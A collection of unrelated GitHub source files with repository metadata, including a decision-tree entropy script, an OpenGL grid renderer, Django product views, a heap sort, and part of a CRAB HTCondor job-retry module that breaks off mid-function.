# file.write(args.username)
# file.write("\n")
# file.write(str_data)
| muktachanda/Social-Media-Personality-Analysis | app/src/main/python/python/insta_scrape.py | insta_scrape.py | py | 4,298 | python | en | code | 0 | github-code | 13 |
74595784016 | from .base_model import BaseVideoPredictionModel
from .base_model import VideoPredictionModel
from .savp_model import SAVPVideoPredictionModel
from .sv2p_model import SV2PVideoPredictionModel
def get_model_class(model):
model_mappings = {
'savp': 'SAVPVideoPredictionModel',
'savp_vae': 'SAVPVideoPredictionModel',
'savp_gan': 'SAVPVideoPredictionModel',
'sv2p': 'SV2PVideoPredictionModel'
}
model_class = model_mappings.get(model, model)
model_class = globals().get(model_class)
if model_class is None or not issubclass(model_class, BaseVideoPredictionModel):
raise ValueError('Invalid model %s' % model)
return model_class
| m-serra/action-inference-for-video-prediction-benchmarking | video_prediction/savp/models/__init__.py | __init__.py | py | 701 | python | en | code | 13 | github-code | 13 |
4723952074 | from math import log
#计算给定数据集的熵
def calcShannonEnt(dataSet):
#返回数据集的行数
numEntries=len(dataSet)
#保存每个标签(Label)出现次数的字典
labelCounts={}
#对每一组的特征向量进行统计
for featVec in dataSet:
#提取标签的信息
currentLabel=featVec[-1]
#查看是否放入字典中,没有就添加进去
if currentLabel not in labelCounts.keys():
labelCounts[currentLabel]=0
labelCounts[currentLabel]+=1
#香农熵
shannonEnt=0.0
#计算香农熵
for key in labelCounts:
#选择标签的概率
prob=float(labelCounts[key])/numEntries
#利用公式计算熵
shannonEnt -=prob*log(prob,2)
return shannonEnt
def createDataSet():#数据集
dataSet=[[0,0,0,0,'no'],[0,0,0,1,'no'],[0,1,0,1,'yes'],[0,1,1,0,'yes'],[0,0,0,0,'no'],
[1,0,0,0,'no'],[1,0,0,1,'no'],[1,1,1,1,'yes'],[1,0,1,2,'yes'],[1,0,1,2,'yes'],
[2,0,1,2,'yes'],[2,0,1,1,'yes'],[2,1,0,1,'yes'],[2,1,0,2,'yes'],[2,0,0,0,'no']]
labels=['年龄','有工作','有自己的房子','信贷情况']#数据的分类属性
return dataSet,labels
#返回数据集和分类属性
#按照给定的特征划分数据集
def splitDataSet(dataSet, axis, value):
# dataSet - 待划分的数据集
# axis - 划分数据集的特征
# value - 需要返回的特征的值
retDataSet = [] #创建返回的数据集列表
for featVec in dataSet: #遍历数据集
if featVec[axis] == value:
reducedFeatVec = featVec[:axis] #去掉axis特征
reducedFeatVec.extend(featVec[axis+1:]) #将符合条件的添加到返回的数据集
retDataSet.append(reducedFeatVec)
return retDataSet #返回划分后的数据集
#选择最好的数据集划分方式
def chooseBestFeatureToSplit(dataSet):
numFeatures = len(dataSet[0]) - 1 #特征数量
baseEntropy = calcShannonEnt(dataSet) #计算数据集的香农熵
bestInfoGain = 0.0 #信息增益
bestFeature = -1 #最优特征的索引值
for i in range(numFeatures): #遍历所有特征
#获取dataSet的第i个所有特征
featList = [example[i] for example in dataSet]
uniqueVals = set(featList) #创建set集合{},元素不可重复
newEntropy = 0.0 #经验条件熵
for value in uniqueVals: #计算信息增益
subDataSet = splitDataSet(dataSet, i, value) #subDataSet划分后的子集
prob = len(subDataSet) / float(len(dataSet)) #计算子集的概率
newEntropy += prob * calcShannonEnt(subDataSet) #根据公式计算经验条件熵
infoGain = baseEntropy - newEntropy #信息增益
print("第%d个特征的增益为%.3f" % (i, infoGain)) #打印每个特征的信息增益
if (infoGain > bestInfoGain): #计算信息增益
bestInfoGain = infoGain #更新信息增益,找到最大的信息增益
bestFeature = i #记录信息增益最大的特征的索引值
return bestFeature #返回信息增益最大的特征的索引值
if __name__ == '__main__':
dataSet, features = createDataSet()
print("最优特征索引值:" + str(chooseBestFeatureToSplit(dataSet))) | JiweiMma/Decision-Tree | Decisiontree-2.py | Decisiontree-2.py | py | 3,793 | python | zh | code | 0 | github-code | 13 |
21580909805 | from ..GLGraphicsItem import GLGraphicsItem
from ..transform3d import Matrix4x4, Quaternion, Vector3
from .shader import Shader
from .BufferObject import VAO, VBO
import numpy as np
import OpenGL.GL as gl
__all__ = ['GLGridItem']
def make_grid_data(size, spacing):
x, y = size
dx, dy = spacing
xvals = np.arange(-x/2., x/2. + dx*0.001, dx, dtype=np.float32)
yvals = np.arange(-y/2., y/2. + dy*0.001, dy, dtype=np.float32)
xlines = np.stack(
np.meshgrid(xvals, [yvals[0], yvals[-1]], indexing='ij'),
axis=2
).reshape(-1, 2)
ylines = np.stack(
np.meshgrid([xvals[0], xvals[-1]], yvals, indexing='xy'),
axis=2
).reshape(-1, 2)
data = np.concatenate([xlines, ylines], axis=0)
data = np.pad(data, ((0, 0), (0, 1)), mode='constant', constant_values=0.0)
return data
class GLGridItem(GLGraphicsItem):
"""
Displays xy plane.
"""
def __init__(
self,
size = (1., 1.),
spacing = (1.,1.),
color = (1.,1.,1.,0.4),
lineWidth = 1,
antialias = True,
glOptions = 'translucent',
parentItem = None
):
super().__init__(parentItem=parentItem)
self.__size = size
self.__color = np.array(color, dtype=np.float32).clip(0, 1)
self.__lineWidth = lineWidth
self.antialias = antialias
self.setGLOptions(glOptions)
self.line_vertices = make_grid_data(self.__size, spacing)
x, y = size
self.plane_vertices = np.array([
-x/2., -y/2., 0,
-x/2., y/2., 0,
x/2., -y/2., 0,
x/2., y/2., 0,
], dtype=np.float32)
self.rotate(90, 1, 0, 0)
self.setDepthValue(-1)
def initializeGL(self):
self.shader = Shader(vertex_shader, fragment_shader)
self.vao = VAO()
self.vbo1 = VBO(
data = [self.line_vertices, self.plane_vertices],
size = [3, 3],
)
def paint(self, model_matrix=Matrix4x4()):
self.setupGLState()
if self.antialias:
gl.glEnable(gl.GL_LINE_SMOOTH)
gl.glHint(gl.GL_LINE_SMOOTH_HINT, gl.GL_NICEST)
gl.glLineWidth(self.__lineWidth)
self.shader.set_uniform("view", self.proj_view_matrix().glData, "mat4")
self.shader.set_uniform("model", model_matrix.glData, "mat4")
with self.shader:
self.vao.bind()
self.shader.set_uniform("objColor1", self.__color, "vec4")
self.vbo1.setAttrPointer(1, attr_id=0)
gl.glDrawArrays(gl.GL_TRIANGLE_STRIP, 0, 4)
gl.glDisable(gl.GL_BLEND)
gl.glDisable(gl.GL_DEPTH_TEST)
self.shader.set_uniform("objColor1", Vector3([0, 0, 0, 1]), "vec4")
self.vbo1.setAttrPointer(0, attr_id=0)
gl.glDrawArrays(gl.GL_LINES, 0, len(self.line_vertices))
gl.glEnable(gl.GL_DEPTH_TEST)
vertex_shader = """
#version 330 core
uniform mat4 model;
uniform mat4 view;
layout (location = 0) in vec3 iPos;
void main() {
gl_Position = view * model * vec4(iPos, 1.0);
}
"""
fragment_shader = """
#version 330 core
out vec4 FragColor;
uniform vec4 objColor1;
void main() {
FragColor = objColor1;
}
""" | Liuyvjin/pyqtOpenGL | pyqtOpenGL/items/GLGridItem.py | GLGridItem.py | py | 3,255 | python | en | code | 0 | github-code | 13 |
3945377298 | #!/usr/bin/env python
# encoding: utf-8
# @author: lishaogang
# @file: prog-1.py
# @time: 2020/7/5 0005 10:41
# @desc:
import matplotlib.pyplot as plt
from dDE.DE import DE
from config import test_funcs
MAXSIZE = 100
MAXDIM = 30
MAXGEN = 1500
TIMES = 1
# lbound = -1.28
# rbound = 1.28
func_id = 2
use_CD = False
use_NCD = True
# best = []
# with open('results/log.txt', 'w+') as log:
# for func_id in range(len(test_funcs)):
for i in range(TIMES):
de = DE(MAXSIZE, MAXDIM, MAXGEN, test_funcs[func_id]['func'],-test_funcs[func_id]['bound'],
test_funcs[func_id]['bound'],use_CD=use_CD, use_NCD=use_NCD)
de.update()
print("the best fitness is ", de.bestFitnessValue)
# log.write("func({})'s fitness:{}\n".format(func_id, de.bestFitnessValue))
# best.append(de.bestFitnessValue)
plt.plot(de.bestFitnessValues)
plt.xlabel("generation\n\nfunc({})'s fitness".format(func_id))
plt.ylabel('fitness')
# plt.savefig("results/func{}.jpg".format(func_id))
plt.show()
# the best fitness is 1.0579375764110492
# the best fitness is 596.6818781875263 | ShaquallLee/evolutionary-programming | dDE/prog-1.py | prog-1.py | py | 1,101 | python | en | code | 0 | github-code | 13 |
2973905510 | def heapAdjust(L, i, j):
next = i * 2
tmp = L[i]
while next <= j:
if next + 1 <= j and L[next + 1] > L[next]:
next = next + 1
if L[next] > L[i]:
L[i] = L[next]
i = next
next = next * 2
else: break
L[i] = tmp
def heapSort(L):
L.insert(0, 0)
for i in range(int((len(L) - 1) / 2), 0, -1):
heapAdjust(L, i, len(L) - 1)
for i in range(len(L) - 1, 0, -1):
L[1], L[i] = L[i], L[1]
heapAdjust(L, 1, i - 1)
return L[1:]
| sangjianshun/Master-School | heapSort.py | heapSort.py | py | 541 | python | en | code | 34 | github-code | 13 |
4699855055 | '''
[문제]
omr 리스트의 값들은 이번 시험 정답이다.
a는 철수의 답안지이다. 랜덤숫자(1~5) 열 개를 a에 추가 후,
정답과 비교해서 철수의 점수를 출력.
한 문제당 10점이다.
[예시]
omr = [4, 3, 1, 5, 3, 2, 1, 4, 5, 3]
철수 = [5, 2, 5, 5, 2, 1, 4, 4, 4, 1]
성적 = 20
'''
import random
omr = [4,3,1,5,3,2,1,4,5,3]
a =[]
total=0
i=0
while i<10:
r=random.randint(1,5)
a.append(r)
if omr[i]==a[i]:
total+=10
i+=1
print(omr)
print(a)
print(total)
| Songmsu/python | H일차배열/일차배열3_문제_누적합_개수/일차배열3_문제03_omr카드_문제.py | 일차배열3_문제03_omr카드_문제.py | py | 598 | python | ko | code | 0 | github-code | 13 |
15283630460 | from django.shortcuts import render, get_object_or_404
from django.contrib.auth.decorators import login_required
from .models import Product
from .forms import RawProductForm
# Create your views here.
@login_required
def product_create_view(request):
my_form = RawProductForm()
if request.method == "POST":
my_form= RawProductForm(request.POST)
if my_form.is_valid():
print(my_form.cleaned_data)
Product.objects.create(**my_form.cleaned_data)
else:
print(my_form.errors)
context = {
"form" : my_form
}
return render(request, "products/product_create.html", context)
@login_required
def product_detail_view(request):
product = Product.objects.get(id=1)
context = {
"product": product
}
return render(request, "products/product_detail.html", context)
@login_required
def product_individual_view(request, id):
product = get_object_or_404(Product, id=id)
context = {
'product': product
}
return render(request, "products/product_detail.html", context)
@login_required
def products_list_view(request):
products_list = Product.objects.all() #lista de objetos
user = request.user.id
context= {
'products_list': products_list,
'userid': user
}
return render(request, "products/products_list.html", context)
| Leopizarro/OrderManager-Django | src/products/views.py | views.py | py | 1,380 | python | en | code | 0 | github-code | 13 |
1025446963 | import argparse
from package import MetaData
from package.log import MockLogger
def get_experiment_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"-f",
"--folder",
help="Folder of tasks to generate latex table for.",
required=True
)
parser.add_argument(
"-e",
"--extension", help="Metadata file extension",
default=".nlp_metadata"
)
parser.add_argument(
"-dad",
"--digits-after-decimal",
default=4,
type=int
)
parser.add_argument(
"-po",
"--prepend-output",
default="latex_dump"
)
return parser.parse_args()
def scientific(number: float) -> str:
factors = "{:.2E}".format(number).split("E")
sign = factors[1][0]
factors[1] = factors[1].lstrip("+-0")
if sign == "-":
factors[1] = "-"+factors[1]
return f"{factors[0]} x $10^{{{factors[1]}}}$"
if __name__ == "__main__":
args = get_experiment_args()
folder_path = args.folder
extension = args.extension
metadata_attrs = ["pearson", "pearson-p", "spearman", "spearman-p", "oov-ratio"]
folder_name = MetaData.get_folder_name(folder_path)
results_file = folder_name + extension
with MetaData(".", "txt", metadata_attrs, results_file) as _md:
md = _md._metadata
dump_file = open(f"{args.prepend_output}_{folder_name}.txt", "w", encoding="utf-8")
lines = [
r"\begin{table}[!htbp]"
r"\centering",
r"\scalebox{0.8}{",
r"\begin{tabular}{|c|cc|}",
r"\hline",
r"Similarity Task & \multicolumn{2}{c|}{Statistics} \\ \hline",
r"\multicolumn{1}{|l|}{\multirow{3}{*}{Syntactic Similarity}} & \multicolumn{1}{c|}{Pearson Result: %.2f} & p-value: %s \\ \cline{2-3} " % (md.loc["syntactic.txt", "pearson"], scientific(md.loc["syntactic.txt", "pearson-p"])),
r"\multicolumn{1}{|l|}{} & \multicolumn{1}{c|}{Spearman Result: %.2f} & p-value: %s \\ \cline{2-3} " % (md.loc["syntactic.txt", "spearman"], scientific(md.loc["syntactic.txt", "spearman-p"])),
r"\multicolumn{1}{|l|}{} & \multicolumn{2}{c|}{OOV Ratio: %.2f} \\ \hline" % (md.loc["syntactic.txt", "oov-ratio"]),
r"\multirow{3}{*}{Semantic Similarity} & \multicolumn{1}{c|}{Pearson Result: %.2f} & p-value: %s \\ \cline{2-3} " % (md.loc["semantic.txt", "pearson"], scientific(md.loc["semantic.txt", "pearson-p"])),
r"& \multicolumn{1}{c|}{Spearman Result: %.2f} & p-value: %s \\ \cline{2-3} " % (md.loc["semantic.txt", "spearman"], scientific(md.loc["semantic.txt", "spearman-p"])),
r"& \multicolumn{2}{c|}{OOV Ratio: %.2f} \\ \hline" % (md.loc["semantic.txt", "oov-ratio"]),
r"\end{tabular}}",
r"\caption{\footnotesize{Placeholder}}",
r"\end{table}",
]
for line in lines:
dump_file.write(f"{line}\n") | Turkish-Word-Embeddings/Word-Embeddings-Repository-for-Turkish | evaluation/dump_similarity_latex_table.py | dump_similarity_latex_table.py | py | 3,067 | python | en | code | 1 | github-code | 13 |
29380812183 | num = int(input('Enter four-digit natural number: '))
search2 = int(input('1) Find the product of the digits of number".\n'
'2) Write the number in reverse order.\n'
'3) In ascending order, sort the numbers included in the given number"\n'
'Enter number of action you need to perform: '))
num1 = (num // 1000)
num2 = (num % 1000 // 100)
num3 = (num % 100 // 10)
num4 = (num % 10)
if search2 == 1:
print('Your answer is ', num1 * num2 * num3 * num4)
elif search2 == 2:
print('Your reverse number: ',str(num4) + str(num3) + str(num2) + str(num1))
elif search2 == 3:
list1 = [int(d) for d in str(num)]
sort = (sorted(list1))
num0 = 0
for i in sort:
num0 = num0 * 10 + i
print('Your sorted number: ',num0)
else:
print('Action is incorrect') | kolyasalubov/Lv-14.03.PythonFundamentals | dmisia/HW3/Practical_Task_2.py | Practical_Task_2.py | py | 836 | python | en | code | 0 | github-code | 13 |
36587499826 | import numpy as np
import math
class Match:
def __init__(self, data1, data2, dist):
self.data1 = data1
self.data2 = data2
self.dist = dist
class KNN:
def __init__(self, datas1, datas2, distf=lambda x, y: math.sqrt(x**2 + y**2)):
self.data1 = datas1
self.data2 = datas2
self.distf = distf
def apply(self, k=3):
matches = []
for d1 in self.data1:
sort = []
for d2 in self.data2:
dist = self.distf(d1, d2)
sort.append(Match(d1, d2, dist))
sort.sort(key=lambda x: x.dist)
matches.append(sort)
return list(map(lambda x: x[:k], matches))
| ysokmr/sift_image_merger | knn.py | knn.py | py | 702 | python | en | code | 1 | github-code | 13 |
34786229988 | from rct229.rule_engine.rule_base import RuleDefinitionBase
from rct229.rule_engine.rule_list_indexed_base import RuleDefinitionListIndexedBase
from rct229.rule_engine.user_baseline_proposed_vals import UserBaselineProposedVals
from rct229.rulesets.ashrae9012019.ruleset_functions.baseline_system_type_compare import (
baseline_system_type_compare,
)
from rct229.rulesets.ashrae9012019.ruleset_functions.baseline_systems.baseline_system_util import (
HVAC_SYS,
)
from rct229.rulesets.ashrae9012019.ruleset_functions.get_baseline_system_types import (
get_baseline_system_types,
)
from rct229.utils.pint_utils import CalcQ
from rct229.utils.std_comparisons import std_equal
APPLICABLE_SYS_TYPES = [
HVAC_SYS.SYS_5,
HVAC_SYS.SYS_6,
HVAC_SYS.SYS_7,
HVAC_SYS.SYS_8,
HVAC_SYS.SYS_11_1,
HVAC_SYS.SYS_11_2,
]
VALIDATION_POINTS_LENGTH = 11
SUPPLY_AIRFLOW_COEFFS = [0.1 * i for i in range(VALIDATION_POINTS_LENGTH)]
DESIGN_POWER_COEFFS = [0.0, 0.03, 0.07, 0.13, 0.21, 0.30, 0.41, 0.54, 0.68, 0.83, 1.0]
class Section23Rule8(RuleDefinitionListIndexedBase):
"""Rule 8 of ASHRAE 90.1-2019 Appendix G Section 23 (Air-side)"""
def __init__(self):
super(Section23Rule8, self).__init__(
rmrs_used=UserBaselineProposedVals(False, True, False),
each_rule=Section23Rule8.HVACRule(),
index_rmr="baseline",
id="23-8",
description="System 5-8 and 11 - part load VAV fan power shall be modeled using either method 1 or 2 in Table G3.1.3.15. This rule will only validate data points from Method-1 Part-load Fan Power Data. However, both methods are equivalent. When modeling inputs are based on Method 2, values should be converted to Method 1 when writing to RMD.",
ruleset_section_title="HVAC - Airside",
standard_section="Section G3.1.3.15 VAV Fan Part-Load Performance (Systems 5 through 8 and 11)",
is_primary_rule=True,
rmr_context="ruleset_model_descriptions/0",
list_path="$.buildings[*].building_segments[*].heating_ventilating_air_conditioning_systems[*]",
)
def is_applicable(self, context, data=None):
rmi_b = context.baseline
baseline_system_types_dict = get_baseline_system_types(rmi_b)
return any(
[
baseline_system_type_compare(system_type, applicable_sys_type, False)
for system_type in baseline_system_types_dict
for applicable_sys_type in APPLICABLE_SYS_TYPES
]
)
def create_data(self, context, data):
rmi_b = context.baseline
baseline_system_types_dict = get_baseline_system_types(rmi_b)
applicable_hvac_sys_ids = [
hvac_id
for sys_type in baseline_system_types_dict
for target_sys_type in APPLICABLE_SYS_TYPES
if baseline_system_type_compare(sys_type, target_sys_type, False)
for hvac_id in baseline_system_types_dict[sys_type]
]
return {"applicable_hvac_sys_ids": applicable_hvac_sys_ids}
def list_filter(self, context_item, data):
hvac_sys_b = context_item.baseline
applicable_hvac_sys_ids = data["applicable_hvac_sys_ids"]
return hvac_sys_b["id"] in applicable_hvac_sys_ids
class HVACRule(RuleDefinitionListIndexedBase):
def __init__(self):
super(Section23Rule8.HVACRule, self).__init__(
rmrs_used=UserBaselineProposedVals(False, True, False),
each_rule=Section23Rule8.HVACRule.SupplyFanRule(),
index_rmr="baseline",
list_path="$.fan_system.supply_fans[*]",
)
class SupplyFanRule(RuleDefinitionBase):
def __init__(self):
super(Section23Rule8.HVACRule.SupplyFanRule, self).__init__(
rmrs_used=UserBaselineProposedVals(False, True, False),
required_fields={
"$": [
"design_airflow",
"design_electric_power",
"output_validation_points",
],
},
)
def get_calc_vals(self, context, data=None):
supply_fan_b = context.baseline
design_airflow_b = supply_fan_b["design_airflow"]
design_electric_power_b = supply_fan_b["design_electric_power"]
output_validation_points_b = supply_fan_b["output_validation_points"]
output_validation_points = [
[output["airflow"], output["result"]]
for output in output_validation_points_b
]
target_validation_points = [
[
SUPPLY_AIRFLOW_COEFFS[idx] * design_airflow_b,
DESIGN_POWER_COEFFS[idx] * design_electric_power_b,
]
for idx in range(VALIDATION_POINTS_LENGTH)
]
return {
"design_airflow_b": CalcQ("air_flow_rate", design_airflow_b),
"design_electric_power_b": CalcQ(
"electric_power", design_electric_power_b
),
"output_validation_points": output_validation_points,
"target_validation_points": target_validation_points,
}
def rule_check(self, context, calc_vals=None, data=None):
output_validation_points = calc_vals["output_validation_points"]
target_validation_points = calc_vals["target_validation_points"]
return len(
output_validation_points
) == VALIDATION_POINTS_LENGTH and all(
[
std_equal(ovp[0], tvp[0]) and std_equal(ovp[1], tvp[1])
for ovp, tvp in zip(
output_validation_points, target_validation_points
)
]
)
| pnnl/ruleset-checking-tool | rct229/rulesets/ashrae9012019/section23/section23rule8.py | section23rule8.py | py | 6,129 | python | en | code | 6 | github-code | 13 |
3079673625 | # Importing requests library to send HTTP requests
# Parsing data using BeautifulSoup function
import requests
from bs4 import BeautifulSoup
#Parsing the webpage
webpage = "https://en.wikipedia.org/wiki/Deep_learning"
Parsedpage = requests.get(webpage).text
soup = BeautifulSoup(Parsedpage,"html.parser")
# Print the title of the web page
title = soup.title
print(title)
# Finding all the links within the page containing a tag
Tag = soup.find_all("a")
for link in Tag:
print(link.get("href")) | adtmv7/CS5590-490-Python-Deep-Learning | ICP3/Source/webscraping.py | webscraping.py | py | 518 | python | en | code | 2 | github-code | 13 |
74563029458 | import os
import re
import sys
import json
import shutil
import subprocess
import socket
from collections import namedtuple
import classad
from ServerUtilities import executeCommand
from ServerUtilities import MAX_DISK_SPACE, MAX_WALLTIME, MAX_MEMORY
JOB_RETURN_CODES = namedtuple('JobReturnCodes', 'OK RECOVERABLE_ERROR FATAL_ERROR')(0, 1, 2)
# Without this environment variable set, HTCondor takes a write lock per logfile entry
os.environ['_condor_ENABLE_USERLOG_LOCKING'] = 'false'
# ==============================================================================
class FatalError(Exception):
pass
class RecoverableError(Exception):
pass
# ==============================================================================
class RetryJob():
"""
Need a doc string here.
"""
def __init__(self):
"""
Class constructor.
"""
self.logger = None
self.reqname = None
self.job_return_code = None
self.dag_retry = None
self.crab_retry = None
self.job_id = None
self.dag_jobid = None
self.dag_clusterid = None
self.site = None
self.username = None
self.ads = []
self.ad = {}
self.report = {}
self.validreport = True
self.integrated_job_time = 0
self.MAX_DISK_SPACE = MAX_DISK_SPACE
self.MAX_WALLTIME = MAX_WALLTIME
self.MAX_MEMORY = MAX_MEMORY
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def get_job_ad_from_condor_q(self):
"""
Need a doc string here.
"""
if self.dag_clusterid == -1:
return
shutil.copy("job_log", "job_log.%s" % str(self.dag_jobid))
p = subprocess.Popen(["condor_q", "-debug", "-l", "-userlog", "job_log.%s" %
str(self.dag_jobid), str(self.dag_jobid)], stdout=subprocess.PIPE, stderr=sys.stderr)
output, _ = p.communicate()
status = p.returncode
try:
os.unlink("job_log.%s" % str(self.dag_jobid))
except Exception: # pylint: disable=broad-except
pass
if status:
raise FatalError("Failed to query condor user log:\n%s" % output)
for text_ad in output.split("\n\n"):
try:
ad = classad.parseOld(text_ad)
except SyntaxError:
continue
if ad:
self.ads.append(ad)
self.ad = self.ads[-1]
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def get_job_ad_from_file(self):
"""
Need a doc string here
"""
self.ads.append(self.ad)
if self.dag_retry == 0:
msg = "This is job retry number 0. Will not try to search and load previous job ads."
self.logger.info(msg)
return
for dag_retry in range(self.dag_retry):
job_ad_file = os.path.join(".", "finished_jobs", "job.%s.%d" % (self.job_id, dag_retry))
if os.path.isfile(job_ad_file):
try:
with open(job_ad_file, encoding='utf-8') as fd:
ad = classad.parseOld(fd)
except Exception: # pylint: disable=broad-except
msg = "Unable to parse classads from file %s. Continuing." % (job_ad_file)
self.logger.warning(msg)
continue
if ad:
self.ads.append(ad)
else:
msg = "File %s does not exist. Continuing." % (job_ad_file)
self.logger.warning(msg)
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def get_report(self):
"""
Need a doc string here.
"""
try:
with open("jobReport.json.%s" % (self.job_id), 'r', encoding='utf-8') as fd:
try:
self.report = json.load(fd)
except ValueError:
self.report = {}
site = self.report.get('executed_site', None)
if site:
self.site = site
except IOError:
self.validreport = False
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def record_site(self, job_status):
"""
Need a doc string here.
"""
job_status_name = None
for name, code in JOB_RETURN_CODES._asdict().items():
if code == job_status:
job_status_name = name
try:
with os.fdopen(os.open("task_statistics.%s.%s" % (self.site, job_status_name), os.O_APPEND | os.O_CREAT | os.O_RDWR, 0o644), 'a') as fd:
fd.write("%s\n" % (self.job_id))
except Exception as ex: # pylint: disable=broad-except
self.logger.error(str(ex))
# Swallow the exception - record_site is advisory only
try:
with os.fdopen(os.open("task_statistics.%s" % (job_status_name), os.O_APPEND | os.O_CREAT | os.O_RDWR, 0o644), 'a') as fd:
fd.write("%s\n" % (self.job_id))
except Exception as ex: # pylint: disable=broad-except
self.logger.error(str(ex))
# Swallow the exception - record_site is advisory only
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def create_fake_fjr(self, exitMsg, exitCode, jobExitCode=None, fatalError=True):
"""
If FatalError is got, fjr is not generated and it is needed for error_summary
Can also used to "fix" the exit code in the fjr yet allow a resubmission if fatalError is False
"""
fake_fjr = {}
fake_fjr['exitMsg'] = exitMsg
if jobExitCode:
fake_fjr['jobExitCode'] = jobExitCode
fake_fjr['exitCode'] = jobExitCode
else:
fake_fjr['exitCode'] = exitCode
jobReport = "job_fjr.%s.%d.json" % (self.job_id, self.crab_retry)
if os.path.isfile(jobReport) and os.path.getsize(jobReport) > 0:
# File exists and it is not empty
msg = "%s file exists and it is not empty!" % (jobReport)
msg += " CRAB3 will overwrite it, because the job got FatalError"
self.logger.info(msg)
with open(jobReport, 'r', encoding='utf-8') as fd:
msg = "Old %s file content: %s" % (jobReport, fd.read())
self.logger.info(msg)
with open(jobReport, 'w', encoding='utf-8') as fd:
msg = "New %s file content: %s" % (jobReport, json.dumps(fake_fjr))
self.logger.info(msg)
json.dump(fake_fjr, fd)
# Fake FJR raises FatalError
if fatalError:
raise FatalError(exitMsg)
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_cpu_report(self):
"""
Need a doc string here.
"""
# If job was killed on the worker node, we probably don't have a FJR.
if self.ad.get("RemoveReason", "").startswith("Removed due to wall clock limit"):
exitMsg = "Not retrying job due to wall clock limit (job automatically killed on the worker node)"
self.create_fake_fjr(exitMsg, 50664, 50664) # this raises FatalError
if "CPU usage over limit" in self.ad.get("RemoveReason", ""):
exitMsg = "Not retrying job due CPU limit (using more CPU than Wall Clock)"
self.create_fake_fjr(exitMsg, 50663, 50663) # this raises FatalError
subreport = self.report
for attr in ['steps', 'cmsRun', 'performance', 'cpu', 'TotalJobTime']:
subreport = subreport.get(attr, None)
if subreport is None:
return
total_job_time = self.report['steps']['cmsRun']['performance']['cpu']['TotalJobTime']
try:
total_job_time = float(total_job_time)
except ValueError:
return
integrated_job_time = 0
for ad in self.ads:
if 'RemoteWallClockTime' in ad:
integrated_job_time += ad['RemoteWallClockTime']
self.integrated_job_time = integrated_job_time
if total_job_time > self.MAX_WALLTIME:
exitMsg = "Not retrying a long running job (job ran for %d hours)" % (total_job_time / 3600)
self.create_fake_fjr(exitMsg, 50664) # this raises FatalError
if integrated_job_time > (1.5 * self.MAX_WALLTIME):
exitMsg = "Not retrying a job because the integrated time (across all retries) is %d hours." % (integrated_job_time / 3600)
self.create_fake_fjr(exitMsg, 50664) # this raises FatalError
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_memory_report(self):
"""
Need a doc string here.
"""
# If job was killed on the worker node, we probably don't have a FJR.
if self.ad.get("RemoveReason", "").startswith("Removed due to memory use"):
job_rss = int(self.ad.get("ResidentSetSize", "0")) // 1000
exitMsg = "Job killed by HTCondor due to excessive memory use"
exitMsg += " (RSS=%d MB)." % job_rss
exitMsg += " Will not retry it."
self.create_fake_fjr(exitMsg, 50660, 50660)
subreport = self.report
for attr in ['steps', 'cmsRun', 'performance', 'memory', 'PeakValueRss']:
subreport = subreport.get(attr, None)
if subreport is None:
return
total_job_memory = self.report['steps']['cmsRun']['performance']['memory']['PeakValueRss']
try:
total_job_memory = float(total_job_memory)
except ValueError:
return
if total_job_memory > self.MAX_MEMORY:
exitMsg = "Not retrying job due to excessive memory use (%d MB vs %d MB requested)" % (total_job_memory, self.MAX_MEMORY)
self.create_fake_fjr(exitMsg, 50660, 50660)
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_disk_report(self):
"""
This function checks 2 things:
a) If remove reason is 'Removed due to disk usage' which is set in PeriodicRemove
expression. PeriodicRemove & PeriodicRemoveReason is set in DagmanCreator.py
before task submittion to scheduler.
b) If disk usage is >= of Maximum allowed disk usage.
If one or other evaluates to true, it will create fake_fjr and job will not be retried.
"""
# If job was killed on the WN, we probably don't have a FJR.
if self.ad.get("RemoveReason", "").startswith("Removed due to disk usage"):
exitMsg = "Not retrying job due to excessive disk usage (job automatically killed on the worker node)"
self.create_fake_fjr(exitMsg, 50662, 50662)
if 'DiskUsage' in self.ad:
diskUsage = int(self.ad['DiskUsage'])
if diskUsage >= self.MAX_DISK_SPACE:
self.logger.debug("Disk Usage: %s, Maximum allowed disk usage: %s", diskUsage, self.MAX_DISK_SPACE)
exitMsg = "Not retrying job due to excessive disk usage (job automatically killed on the worker node)"
self.create_fake_fjr(exitMsg, 50662, 50662)
else:
msg = "Unable to get DiskUsage from job classads. Will not perform Disk Usage check."
self.logger.debug(msg)
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_expired_report(self):
"""
If a job was removed because it stay idle more than a week don't retry
"""
if self.ad.get("RemoveReason", "").startswith("Removed due to idle time limit"):
exitMsg = "Not retrying job due to excessive idle time (job automatically killed on the grid scheduler)"
self.create_fake_fjr(exitMsg, 50665, 50665)
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_exit_code(self):
"""
Using the exit code saved in the json job report, decide whether it corresponds
to a recoverable or a fatal error.
"""
if 'exitCode' not in self.report:
msg = "'exitCode' key not found in job report."
self.logger.warning(msg)
return 1
try:
exitCode = int(self.report['exitCode'])
except ValueError:
msg = "Unable to extract job's wrapper exit code from job report."
self.logger.warning(msg)
return 1
exitMsg = self.report.get("exitMsg", "UNKNOWN")
if exitCode == 0:
msg = "Job and stageout wrappers finished successfully (exit code %d)." % (exitCode)
self.logger.info(msg)
return 0
msg = "Job or stageout wrapper finished with exit code %d." % (exitCode)
msg += " Trying to determine the meaning of the exit code and if it is a recoverable or fatal error."
self.logger.info(msg)
# Wrapper script sometimes returns the posix return code (8 bits).
if exitCode in [8020, 8021, 8028] or exitCode in [84, 85, 92]:
try: # the following is still a bit experimental, make sure it never crashes the PJ
corruptedInputFile = self.check_corrupted_file(exitCode)
except Exception as e: # pylint: disable=broad-except
msg = f"check_corrupted_file raised an exception:\n{e}\nIgnore and go on"
self.logger.error(msg)
corruptedInputFile = False
if corruptedInputFile:
